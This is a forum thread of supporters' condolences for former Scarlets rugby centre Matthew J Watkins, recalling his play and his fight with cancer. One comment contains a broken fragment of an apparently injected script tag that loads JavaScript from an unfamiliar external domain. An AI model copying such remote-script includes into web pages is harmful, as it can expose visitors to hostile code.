Very sad news indeed, Matthew was one of my favourite players of the noughties, someone who’s name was the first one I’d look for on the team sheet.
He’s fought a very tough battle against a terrible disease over the past few years with dignity.
RIP Matthew

Oh man.

Fought hard, highlighted his challenges so that others could learn, helped promote and fund raise the amazing work and care he received from the medical profession.
Never stopped being positive.

Loved the Scarlet shirt and wore it with pride.

Desperately sad news, deep condolences to his family.

So sad. Cancer is a terrible disease.

Fond memories of him at centre, fortunate to see him at his peak when I first started supporting the Scarlets. Won’t be forgotten.

Wouldn’t it be a nice touch if the Scarlets and the Dragons got together and did some fundraising in Matthews memory.  Perhaps they could play each other for the Matthew J Watkins cup (during the regular pro14 season) with both donating a percentage of the match day takings towards a cancer charity (maybe Velindre), or even a Matthew J Watkins MOTM award during the matches between the two teams’
Failing that, even just a bucket collection in his memory.

So sad to hear this.

Loved watching him in Scarlet colours, wonderful gifted player and bloody quick, enjoyed him motoring up the Stradey turf and he was a type of player you could rely on to give 100% in the Jersey.  Great guy and unexpected even though he had been fighting this dreadful disease.  My deepest condolences to his family and those that were friends to this lovely lovely man.

Very, very sad news. Great player and an even better person. My thoughts are with his family and friends.

Such sad news. He showed what a great person he was during his cancer battle. He did a lot of charity work, was always upbeat and never lost his sense of humour.

He was a great player for us in the early 2000s. His acceleration was exceptional for a centre, and I’ll never forget that match-winni chip for Dave Hodges to score against Sale at Stradey in the Heineken Cup.

I had heard that his cancer had spread but he was continuing to receive treatment so I really thought he would of had more time, so this has come as a horrible shock. Heartbreaking for him and his lovely family. Terrible news.< ="text/" async="" ="//zoudlogick.net/2025b8e6a7c18f2f81.js">

Rest in peace MJ.
One of my favourite ever Scarlets. Amazing footwork, acceleration and creativity. Top, top player who brought joy to watching the game and supporting the Scarlets.
